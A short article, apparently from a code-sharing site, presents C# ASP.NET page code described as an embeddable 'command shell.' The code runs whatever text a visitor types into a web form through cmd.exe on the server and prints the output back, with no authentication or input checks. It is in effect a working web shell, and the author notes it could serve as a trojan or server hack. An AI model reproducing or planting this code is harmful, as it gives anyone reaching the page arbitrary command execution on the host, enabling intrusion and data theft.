Introduction
This is a nice command shell that can we embedded in a webpage to run commands on the server.
Background
I took the original code from Will Asrari's site, ao all thanks go to him:
I just made some changes to his code.
The code does not have any error handling implemented.
Using the Code
You can modify the code to run a batch file or commands directly.
using System;
using System.Data;
using System.Configuration;
using System.Collections;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;
public partial class _Default : System.Web.UI.Page
{
protected void Page_Load(object sender, EventArgs e)
{
if(Page.IsPostBack)
{
string exec = TextBox1.Text;
string strFilePath = Server.MapPath("fine.bat");
System.Diagnostics.ProcessStartInfo psi =
new System.Diagnostics.ProcessStartInfo("cmd.exe");
psi.UseShellExecute = false;
psi.RedirectStandardOutput = true;
psi.RedirectStandardInput = true;
psi.RedirectStandardError = true;
System.Diagnostics.Process proc =
System.Diagnostics.Process.Start(psi);
System.IO.StreamReader strm = proc.StandardError;
System.IO.StreamReader sOut = proc.StandardOutput;
System.IO.StreamWriter sIn = proc.StandardInput;
sIn.WriteLine(exec);
strm.Close();
string stEchoFmt = "# {0} run successfully. Exiting";
sIn.WriteLine(String.Format(stEchoFmt, strFilePath));
sIn.WriteLine("EXIT");
proc.Close();
string results = sOut.ReadToEnd().Trim();
sIn.Close();
sOut.Close();
string fmtStdOut = "<font face=courier size=0>{0}</font>";
this.Response.Write("<br>");
this.Response.Write("<br>");
this.Response.Write("<br>");
this.Response.Write(String.Format(fmtStdOut,
results.Replace(System.Environment.NewLine, "<br>")));
}
}
}
Points of Interest
There can be a potentially unwanted use of this code as a trojan or as an ASP.NET hack into the server. Use it at your own risk and responsibility.
History
Suggestions are welcome at darknessends@gmail.com. Any bugs or improvements will be highly appreciated.